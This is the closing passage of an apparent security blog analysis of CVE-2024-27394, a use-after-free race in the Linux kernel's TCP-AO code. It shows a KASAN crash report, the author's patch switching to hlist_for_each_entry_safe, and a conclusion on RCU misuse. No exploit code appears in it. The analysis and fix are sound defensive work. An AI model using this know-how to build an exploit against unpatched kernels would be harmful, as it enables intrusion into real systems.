[ 355.629285] anon flags: 0x200000000000840(slab|head|node=0|zone=2)
[ 355.629663] page_type: 0xffffffff()
[ 355.629880] raw: 0200000000000840 ffff888100042b40 0000000000000000 dead000000000001
[ 355.630348] raw: 0000000000000000 0000000000100010 00000001ffffffff 0000000000000000
[ 355.630812] page dumped because: kasan: bad access detected
[ 355.631151]
[ 355.631251] Memory state around the buggy address:
[ 355.631545] ffff88810a3d0300: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc
[ 355.631984] ffff88810a3d0380: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc
[ 355.632420] >ffff88810a3d0400: fa fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb
[ 355.632854] ^
[ 355.633056] ffff88810a3d0480: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb
[ 355.633491] ffff88810a3d0500: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc
[ 355.633931] ==================================================================
[ 355.634447] Disabling lock debugging due to kernel taint
Since this vulnerability occurs in TCP itself, it can be triggered without creating a separate Network Namespace.
In the end, I patched CVE-2024-27394 by replacing hlist_for_each_entry_rcu with hlist_for_each_entry_safe, which prevents the UAF regardless of the RCU Read-side Critical Section.
diff --git a/net/ipv4/tcp_ao.c b/net/ipv4/tcp_ao.c
index 3afeeb68e8a7..781b67a52571 100644
--- a/net/ipv4/tcp_ao.c
+++ b/net/ipv4/tcp_ao.c
@@ -1068,6 +1068,7 @@ void tcp_ao_connect_init(struct sock *sk)
{
struct tcp_sock *tp = tcp_sk(sk);
struct tcp_ao_info *ao_info;
+ struct hlist_node *next;
union tcp_ao_addr *addr;
struct tcp_ao_key *key;
int family, l3index;
@@ -1090,7 +1091,7 @@ void tcp_ao_connect_init(struct sock *sk)
l3index = l3mdev_master_ifindex_by_index(sock_net(sk),
sk->sk_bound_dev_if);
- hlist_for_each_entry_rcu(key, &ao_info->head, node) {
+ hlist_for_each_entry_safe(key, next, &ao_info->head, node) {
if (!tcp_ao_key_cmp(key, l3index, addr, key->prefixlen, family, -1, -1))
continue;
Conclusion
This post analyzed CVE-2024-27394, a vulnerability that arose from the incorrect use of RCU, and introduced a method to reliably trigger it using the ExpRace technique.
Race Conditions caused by the incorrect use of RCU can be challenging to identify, because there are many kinds of RCU APIs and Read-side Critical Sections can be nested. Therefore, more focused analysis is required to find such RCU Race Condition vulnerabilities.